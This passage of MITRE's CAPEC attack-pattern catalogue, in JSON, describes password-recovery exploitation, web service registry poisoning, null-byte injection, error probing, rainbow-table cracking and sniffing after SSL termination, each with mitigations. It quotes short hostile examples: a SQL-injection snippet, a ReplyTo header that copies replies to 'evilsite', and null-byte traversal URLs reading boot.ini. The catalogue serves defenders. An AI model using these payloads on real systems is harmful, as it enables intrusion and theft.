CVE-2004-1143"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"521"},{"CWE_ID":"262"},{"CWE_ID":"263"},{"CWE_ID":"257"},{"CWE_ID":"654"},{"CWE_ID":"307"},{"CWE_ID":"308"},{"CWE_ID":"309"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1110.001","Entry_Name":"Brute Force:Password Guessing"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Description, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"50":{"ID":"50","Name":"Password Recovery Exploitation","Abstraction":"Standard","Status":"Draft","Description":"An attacker may take advantage of the application feature to help users recover their forgotten passwords in order to gain access into the system with the same privileges as the original user. Generally password recovery schemes tend to be weak and insecure. Most of them use only one security question . For instance, mother\'s maiden name tends to be a fairly popular one. Unfortunately in many cases this information is not very hard to find, especially if the attacker knows the legitimate user. These generic security questions are also re-used across many applications, thus making them even more insecure. An attacker could for instance overhear a coworker talking to a bank representative at the work place and supplying their mother\'s maiden name for verification purposes. An attacker can then try to log in into one of the victim\'s accounts, click on \\"forgot password\\" and there is a good chance that the security question there will be to provide mother\'s maiden name. A weak password recovery scheme totally undermines the effectiveness of a strong password scheme.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"212","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanPrecede","CAPEC_ID":"600"},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"560"},{"Nature":"CanPrecede","CAPEC_ID":"561"},{"Nature":"CanPrecede","CAPEC_ID":"653"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Understand the password recovery mechanism and how it works."},{"Step":"2","Phase":"Exploit","Description":"Find a weakness in the password recovery mechanism and exploit it. For instance, a weakness may be that a standard single security question is used with an easy to determine answer."}]},"Prerequisites":{"Prerequisite":["The system allows users to recover their passwords and gain access back into the system.","Password recovery mechanism has been designed or implemented insecurely.","Password recovery mechanism relies only on something the user knows and not something the user has.","No third party intervention is required to use the password recovery mechanism."]},"Skills_Required":{"Skill":["Brute force attack",{"Level":"Low"},"Social engineering and more sophisticated technical attacks.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"For a brute force attack one would need a machine with sufficient CPU, RAM and HD."},"Indicators":{"Indicator":"Many incorrect attempts to answer the security question."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Use multiple security questions (e.g. have three and make the user answer two of them correctly). Let the user select their own security questions or provide them with choices of questions that are not generic.","E-mail the temporary password to the registered e-mail address of the user rather than letting the user reset the password online.","Ensure that your password recovery functionality is not vulnerable to an injection style attack."]},"Example_Instances":{"Example":["An attacker clicks on the \\"forgot password\\" and is presented with a single security question. The question is regarding the name of the first dog of the user. The system does not limit the number of attempts to provide the dog\'s name. An attacker goes through a list of 100 most popular dog names and finds the right name, thus getting the ability to reset the password and access the system.",{"p":["phpBanner Exchange is a PHP script (using the mySQL database) that facilitates the running of a banner exchange without extensive knowledge of PHP or mySQL.","A SQL injection was discovered in the password recovery module of the system that allows recovering an arbitrary user\'s password and taking over their account. The problem is due to faulty input sanitization in the phpBannerExchange, specifically the e-mail address of the user which is requested by the password recovery module.","The e-mail address requested by the password recovery module on the resetpw.php page. That e-mail address is validated with the following regular expression:","A bug in the implementation of eregi() allows to pass additional character using a null byte \\"\\\\0\\". Since eregi() is implemented in C, the variable $email is treated as a zero-terminated string. All characters following the Null Byte will not be recognized by the regular expression. So an e-mail address can be provided that includes the special character \\" \' \\" to break the SQL query below (and it will not be rejected by the regular expression because of the null byte trick). So a SQL injection becomes possible:","This query will return a non-zero result set even though the email supplied (attacker\'s email) is not in the database.","Then a new password for the user is generated and sent to the $email address, an e-mail address controlled by the attacker. An attacker can then log in into the system."],"div":["if(!eregi(\\"^[_a-z0-9-]+(\\\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\\\.[a-z0-9-]+)*",{"style":"margin-left:10px;","class":"informative","div":["(\\\\.[a-z]{2,3})$\\", $email)){",{"style":"margin-left:10px;"}]},"$get_info=mysql_query(\\"select * from banneruser where",{"style":"margin-left:10px;","class":"informative","div":["email=\'$email\' \\");",{"style":"margin-left:10px;"}]}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"640"}]},"References":{"Reference":{"External_Reference_ID":"REF-429"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"51":{"ID":"51","Name":"Poison Web Service Registry","Abstraction":"Detailed","Status":"Draft","Description":"SOA and Web Services often use a registry to perform look up, get schema information, and metadata about services. A poisoned registry can redirect (think phishing for servers) the service requester to a malicious service provider, provide incorrect information in schema or metadata, and delete information about service provider interfaces. WS-Addressing is used to virtualize services, provide return addresses and other routing information, however, unless the WS-Addressing headers are protected they are vulnerable to rewriting. Content in a registry is deployed by the service provider. The registry in an SOA or Web Services system can be accessed by the service requester via UDDI or other protocol.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"203"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find a target SOA or Web Service] The adversary must first indentify a target SOA or Web Service."},{"Step":"2","Phase":"Experiment","Description":"[Determine desired outcome] Because poisoning a web service registry can have different outcomes, the adversary must decide how they wish to effect the webservice.","Technique":["An adversary can perform a denial of service attack on a web service.","An adversary can redirect requests or responses to a malicious service."]},{"Step":"3","Phase":"Experiment","Description":"[Determine if a malicious service needs to be created] If the adversary wishes to redirect requests or responses, they will need to create a malicious service to redirect to.","Technique":["Create a service to that requests are sent to in addition to the legitimate service and simply record the requests.","Create a service that will give malicious responses to a service provider.","Act as a malicious service provider and respond to requests in an arbitrary way."]},{"Step":"4","Phase":"Exploit","Description":"[Poison Web Service Registry] Based on the desired outcome, poison the web service registry. This is done by altering the data at rest in the registry or uploading malicious content by spoofing a service provider.","Technique":["Intercept and change WS-Adressing headers to route to a malicious service or service provider.","Provide incorrect information in schema or metadata to cause a denial of service.","Delete information about service procider interfaces to cause a denial of service."]}]},"Prerequisites":{"Prerequisite":"The attacker must be able to write to resources or redirect access to the service registry."},"Skills_Required":{"Skill":["To identify and execute against an over-privileged system interface",{"Level":"Low"}]},"Resources_Required":{"Resource":"Capability to directly or indirectly modify registry resources"},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Design: Enforce principle of least privilege","Design: Harden registry server and file access permissions","Implementation: Implement communications to and from the registry using secure protocols"]},"Example_Instances":{"Example":{"p":["WS-Addressing provides location and metadata about the service endpoints. An extremely hard to detect attack is an attacker who updates the WS-Addressing header, leaves the standard service request and service provider addressing and header information intact, but adds an additional WS-Addressing Replyto header. In this case the attacker is able to send a copy (like a cc in mail) of every result the service provider generates. So every query to the bank account service, would generate a reply message of the transaction status to both the authorized service requester and an attacker service. This would be extremely hard to detect at runtime.","In this example \\"evilsite\\" is an additional reply to address with full access to all the messages that the authorized (validClient) has access to. Since this is registered with ReplyTo header it will not generate a Soap fault."],"div":["<S:Header>",{"style":"margin-left:10px;","class":"informative","div":["<wsa:MessageID>",{"style":"margin-left:10px;","div":["http://example.com/Message",{"style":"margin-left:10px;"},"<wsa:Address>http://valid.example/validClient</wsa:Address>",{"style":"margin-left:10px;"},"<wsa:Address>http://evilsite/evilClient</wsa:Address>",{"style":"margin-left:10px;"},"<wsa:Address>http://validfaults.example/ErrorHandler</wsa:Address>",{"style":"margin-left:10px;"}]}]}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"285"},{"CWE_ID":"74"},{"CWE_ID":"693"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}}},"52":{"ID":"52","Name":"Embedding NULL Bytes","Abstraction":"Detailed","Status":"Draft","Description":"An attacker embeds one or more null bytes in input to the target software. This attack relies on the usage of a null-valued byte as a string terminator in many environments. The goal is for certain components of the target software to stop processing the input when it encounters the null byte(s).","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Identify a place in the program where user input may be used to escalate privileges by for instance accessing unauthorized file system resources through directory browsing."},{"Step":"2","Phase":"Explore","Description":"An attacker realizes that there is a postfix data that gets in the way of getting to the desired resources"},{"Step":"3","Phase":"Exploit","Description":"An attacker then ads a postfix NULL terminator to the supplied input in order to \\"swallow\\" the postfixed data when the insertion is taking place. With the postfix data that got in the way of the attack gone, the doors are opened for accessing the desired resources."}]},"Prerequisites":{"Prerequisite":"The program does not properly handle postfix NULL terminators"},"Skills_Required":{"Skill":["Directory traversal",{"Level":"Medium"},"Execution of arbitrary code",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":"Properly handle the NULL characters supplied as part of user input prior to doing anything with the data."},"Example_Instances":{"Example":[{"p":["Directory Browsing","Assume a Web application allows a user to access a set of reports. The path to the reports directory may be something like web/username/reports. If the username is supplied via a hidden field, an attacker could insert a bogus username such as ../../../../../WINDOWS. If the attacker needs to remove the trailing string /reports, then they can simply insert enough characters so the string is truncated. Alternatively the attacker might apply the postfix NULL character (%00) to determine whether this terminates the string.","Different forms of NULL to think about include"],"div":["PATH%00",{"style":"margin-left:10px;","class":"informative"}]},{"p":["Exploitation of a buffer overflow vulnerability in the ActiveX component packaged with Adobe Systems Inc.\'s Acrobat/Acrobat Reader allows remote attackers to execute arbitrary code.","The problem specifically exists upon retrieving a link of the following form:","Where [long string] is a malicious crafted long string containing acceptable URI characters. The request must be made to a web server that truncates the request at the null byte (%00), otherwise an invalid file name is specified and a \\"file not found\\" page will be returned. Example web servers that truncate the requested URI include Microsoft IIS and Netscape Enterprise. Though the requested URI is truncated for the purposes of locating the file the long string is still passed to the Adobe ActiveX component responsible for rendering the page. This in turn triggers a buffer overflow within RTLHeapFree() allowing for an attacker to overwrite an arbitrary word in memory. The responsible instructions from RTLHeapFree() are shown here:","The register EDI contains a pointer to a user-supplied string. The attacker therefore has control over both the ECX and EAX registers used in the shown MOV instruction.","Successful exploitation allows remote attackers to utilize the arbitrary word overwrite to redirect the flow of control and eventually take control of the affected system. Code execution will occur under the context of the user that instantiated the vulnerable version of Adobe Acrobat.","An attacker does not need to establish a malicious web site as exploitation can occur by adding malicious content to the end of any embedded link and referencing any Microsoft IIS or Netscape Enterprise web server. Clicking on a direct malicious link is also not required as it may be embedded within an IMAGE tag, an IFRAME or an auto-loading script.","Successful exploitation requires that a payload be written such that certain areas of the input are URI acceptable. This includes initial injected instructions as well as certain overwritten addresses. This increases the complexity of successful exploitation. While not trivial, exploitation is definitely plausible [REF-445]."],"div":["GET /any_existing_dir/any_existing_pdf.pdf%00[long string] HTTP/1.1",{"style":"margin-left:10px;","class":"informative"},"0x77F83AE5 MOV EAX,[EDI+8]",{"style":"margin-left:10px;","class":"informative"}]},{"p":["Consider the following PHP script:","A malicious attacker might open the following URL, disclosing the boot.ini file:"],"div":["$whatever = addslashes($_REQUEST[\'whatever\']);",{"style":"margin-left:10px;","class":"informative"},"http://localhost/phpscript.php?whatever=../../../../boot.ini%00",{"style":"margin-left:10px;","class":"informative"}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"158"},{"CWE_ID":"172"},{"CWE_ID":"173"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"707"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"28","Entry_Name":"Null Byte Injection"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Embedding Null Code"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-445"},{"External_Reference_ID":"REF-446"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"53":{"ID":"53","Name":"Postfix, Null Terminate, and Backslash","Abstraction":"Detailed","Status":"Draft","Description":"If a string is passed through a filter of some kind, then a terminal NULL may not be valid. Using alternate representation of NULL allows an attacker to embed the NULL mid-string while postfixing the proper data so that the filter is avoided. One example is a filter that looks for a trailing slash character. If a string insertion is possible, but the slash must exist, an alternate encoding of NULL in mid-string may be used.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An attacker first probes to figure out what restrictions on input are placed by filter, such as a specific characters on the end of the URL."},{"Step":"2","Phase":"Exploit","Description":"The attacker then injects a string of their choosing with a null terminator (using an alternate encoding such as %00), followed by a backslash (%5C), followed by some additional characters that are required to keep the filter happy"},{"Step":"3","Phase":"Exploit","Description":{"p":["The malicious string then passes through the filter and passed to the underlying API. Everything after the null terminator is ignored. This may give an attacker the opportunity to access file system resources to which they should not have access and do other things.","Some popular forms in which this takes place:"],"div":["PATH%00%5C",{"style":"margin-left:10px;","class":"informative"}]}}]},"Prerequisites":{"Prerequisite":"Null terminators are not properly handled by the filter."},"Skills_Required":{"Skill":["An attacker needs to understand alternate encodings, what the filter looks for and the data format acceptable to the target API",{"Level":"Medium"}]},"Indicators":{"Indicator":"Null characters are observed by the filter. The filter needs to be able to understand various encodings of the Null character, or only canonical data should be passed to it."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Properly handle Null characters. Make sure canonicalization is properly applied. Do not pass Null characters to the underlying APIs.","Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system."]},"Example_Instances":{"Example":{"p":["A rather simple injection is possible in a URL:","This attack has appeared with regularity in the wild. There are many variations of this kind of attack. Spending a short amount of time injecting against Web applications will usually result in a new exploit being discovered."],"div":["http://getAccessHostname/sekbin/",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"158"},{"CWE_ID":"172"},{"CWE_ID":"173"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"707"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"54":{"ID":"54","Name":"Query System for Information","Abstraction":"Standard","Status":"Draft","Description":"An adversary, aware of an application\'s location (and possibly authorized to use the application), probes an application\'s structure and evaluates its robustness by submitting requests and examining responses. Often, this is accomplished by sending variants of expected queries in the hope that these modified queries might return information beyond what the expected set of queries would provide.","Likelihood_Of_Attack":"High","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"116","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"437"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine parameters] Determine all user-controllable parameters of the application either by probing or by finding documentation"},{"Step":"2","Phase":"Experiment","Description":"[Cause error condition] Inject each parameter with content that causes an error condition to manifest"},{"Step":"3","Phase":"Experiment","Description":"[Modify parameters] Modify the content of each parameter according to observed error conditions"},{"Step":"4","Phase":"Exploit","Description":"[Follow up attack] Once the above steps have been repeated with enough parameters, the application will be sufficiently mapped out. The adversary can then launch a desired attack (for example, Blind SQL Injection)"}]},"Prerequisites":{"Prerequisite":"This class of attacks does not strictly require authorized access to the application. As Attackers use this attack process to classify, map, and identify vulnerable aspects of an application, it simply requires hypotheses to be verified, interaction with the application, and time to conduct trial-and-error activities."},"Skills_Required":{"Skill":["Although fuzzing parameters is not difficult, and often possible with automated fuzzers, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design.",{"Level":"Medium"}]},"Resources_Required":{"Resource":{"p":["The Attacker needs the ability to probe application functionality and provide it erroneous directives or data without triggering intrusion detection schemes or making enough of an impact on application logging that steps are taken against the adversary.","The Attack does not need special hardware, software, skills, or access."]}},"Indicators":{"Indicator":"Repeated errors generated by the same piece of code are an indication, although it requires careful monitoring of the application and its associated error logs, if any."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Application designers can construct a \'code book\' for error messages. When using a code book, application error messages aren\'t generated in string or stack trace form, but are cataloged and replaced with a unique (often integer-based) value \'coding\' for the error. Such a technique will require helpdesk and hosting personnel to use a \'code book\' or similar mapping to decode application errors/logs in order to respond to them normally.","Application designers can wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. Such a technique is often used in conjunction with the above \'code book\' suggestion."]},"Example_Instances":{"Example":["Blind SQL injection is an example of this technique, applied to successful exploit. See also: CVE-2006-4705",{"p":["Attacker sends bad data at various servlets in a J2EE system, records returned exception stack traces, and maps application functionality.","In addition, this technique allows attackers to correlate those servlets used with the underlying open source packages (and potentially version numbers) that provide them."]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"209"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow, Resources_Required"}],"Previous_Entry_Name":["Probe Application Error Reporting",{"Date":"2015-11-09"}]}},"55":{"ID":"55","Name":"Rainbow Table Password Cracking","Abstraction":"Detailed","Status":"Draft","Description":"An attacker gets access to the database table where hashes of passwords are stored. They then use a rainbow table of pre-computed hash chains to attempt to look up the original password. Once the original password corresponding to the hash is obtained, the attacker uses the original password to gain access to the system. A password rainbow table stores hash chains for various passwords. A password chain is computed, starting from the original password, P, via a reduce(compression) function R and a hash function H. A recurrence relation exists where Xi+1 = R(H(Xi)), X0 = P. Then the hash chain of length n for the original password P can be formed: X1, X2, X3, ... , Xn-2, Xn-1, Xn, H(Xn). P and H(Xn) are then stored together in the rainbow table. Constructing the rainbow tables takes a very long time and is computationally expensive. A separate table needs to be constructed for the various hash algorithms (e.g. SHA1, MD5, etc.). However, once a rainbow table is computed, it can be very effective in cracking the passwords that have been hashed without the use of salt.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"49"},{"Nature":"CanPrecede","CAPEC_ID":"600"},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"560"},{"Nature":"CanPrecede","CAPEC_ID":"561"},{"Nature":"CanPrecede","CAPEC_ID":"653"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine application\'s/system\'s password policy] Determine the password policies of the target application/system.","Technique":["Determine minimum and maximum allowed password lengths.","Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.).","Determine account lockout policy (a strict account lockout policy will prevent brute force attacks)."]},{"Step":"2","Phase":"Explore","Description":"[Obtain password hashes] An attacker gets access to the database table storing hashes of passwords or potentially just discovers a hash of an individual password.","Technique":["Obtain copy of database table or flat file containing password hashes (by breaking access controls, using SQL Injection, etc.)","Obtain password hashes from platform-specific storage locations (e.g. Windows registry)","Sniff network packets containing password hashes."]},{"Step":"3","Phase":"Exploit","Description":"[Run rainbow table-based password cracking tool] An attacker finds or writes a password cracking tool that uses a previously computed rainbow table for the right hashing algorithm. It helps if the attacker knows what hashing algorithm was used by the password system.","Technique":"Run rainbow table-based password cracking tool such as Ophcrack or RainbowCrack. Reduction function must depend on application\'s/system\'s password policy."}]},"Prerequisites":{"Prerequisite":["Hash of the original password is available to the attacker. For a better chance of success, an attacker should have more than one hash of the original password, and ideally the whole table.","Salt was not used to create the hash of the original password. Otherwise the rainbow tables have to be re-computed, which is very expensive and will make the attack effectively infeasible (especially if salt was added in iterations).","The system uses one factor password based authentication."]},"Skills_Required":{"Skill":["A variety of password cracking tools are available that can leverage a rainbow table. The more difficult part is to obtain the password hash(es) in the first place.",{"Level":"Low"}]},"Resources_Required":{"Resource":"Rainbow table of password hash chains with the right algorithm used. A password cracking tool that leverages this rainbow table will also be required. Hash(es) of the password is required."},"Indicators":{"Indicator":"This is a completely offline attack that an attacker can perform at their leisure after the password hashes are obtained."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":"Use salt when computing password hashes. That is, concatenate the salt (random bits) with the original password prior to hashing it."},"Example_Instances":{"Example":"BusyBox 1.1.1 does not use a salt when generating passwords, which makes it easier for local users to guess passwords from a stolen password file using techniques such as rainbow tables. See also: CVE-2006-1058"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"261"},{"CWE_ID":"521"},{"CWE_ID":"262"},{"CWE_ID":"263"},{"CWE_ID":"654"},{"CWE_ID":"916"},{"CWE_ID":"308"},{"CWE_ID":"309"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1110.002","Entry_Name":"Brute Force:Password Cracking"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Abstraction, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"57":{"ID":"57","Name":"Utilizing REST\'s Trust in the System Resource to Obtain Sensitive Data","Abstraction":"Detailed","Status":"Draft","Description":"This attack utilizes a REST(REpresentational State Transfer)-style applications\' trust in the system resources and environment to obtain sensitive data once SSL is terminated. Rest applications premise is that they leverage existing infrastructure to deliver web services functionality. An example of this is a Rest application that uses HTTP Get methods and receives a HTTP response with an XML document. These Rest style web services are deployed on existing infrastructure such as Apache and IIS web servers with no SOAP stack required. Unfortunately from a security standpoint, there frequently is no interoperable identity security mechanism deployed, so Rest developers often fall back to SSL to deliver security. In large data centers, SSL is typically terminated at the edge of the network - at the firewall, load balancer, or router. Once the SSL is terminated the HTTP request is in the clear (unless developers have hashed or encrypted the values, but this is rare). The attacker can utilize a sniffer such as Wireshark to snapshot the credentials, such as username and password that are passed in the clear once SSL is terminated. Once the attacker gathers these credentials, they can submit requests to the web service provider just as authorized user do. There is not typically an authentication on the client side, beyond what is passed in the request itself so once this is compromised, then this is generally sufficient to compromise the service\'s authentication scheme.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"157"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find a REST-style application that uses SSL] The adversary must first find a REST-style application that uses SSL to target. Because this attack is easier to carry out from inside of a server network, it is likely that an adversary could have inside knowledge of how services operate."},{"Step":"2","Phase":"Experiment","Description":"[Insert a listener to sniff client-server communication] The adversary inserts a listener that must exist beyond the point where SSL is terminated. This can be placed on the client side if it is believed that sensitive information is being sent to the client as a response, although most often the listener will be placed on the server side to listen for client authentication information.","Technique":"Run wireshark or tcpdump on a device that is on the inside of a firewall, load balancer, or router of a network and capture traffic after SSL has been terminated"},{"Step":"3","Phase":"Exploit","Description":"[Gather information passed in the clear] If developers have not hashed or encrypted data sent in the sniffed request, the adversary will be able to read this data in the clear. Most commonly, they will now have a username or password that they can use to submit requests to the web service just as an authorized user"}]},"Prerequisites":{"Prerequisite":["Opportunity to intercept must exist beyond the point where SSL is terminated.","The attacker must be able to insert a listener actively (proxying the communication) or passively (sniffing the communication) in the client-server communication path."]},"Skills_Required":{"Skill":["To insert a network sniffer or other listener into the communication stream",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Implementation: Implement message level security such as HMAC in the HTTP communication","Design: Utilize defense in depth, do not rely on a single security mechanism like SSL","Design: Enforce principle of least privilege"]},"Example_Instances":{"Example":"The Rest service provider uses SSL to protect the communications between the service requester (client) to the service provider. In the instance where SSL is terminated before the communications reach the web server, it is very common in enterprise data centers to terminate SSL at a router, firewall, load balancer, proxy or other device, then the attacker can insert a sniffer into the communication stream and gather all the authentication tokens (such as session credentials, username/passwords combinations, and so on). The Rest service requester and service provider do not have any way to detect this attack."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"300"},{"CWE_ID":"287"},{"CWE_ID":"693"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The 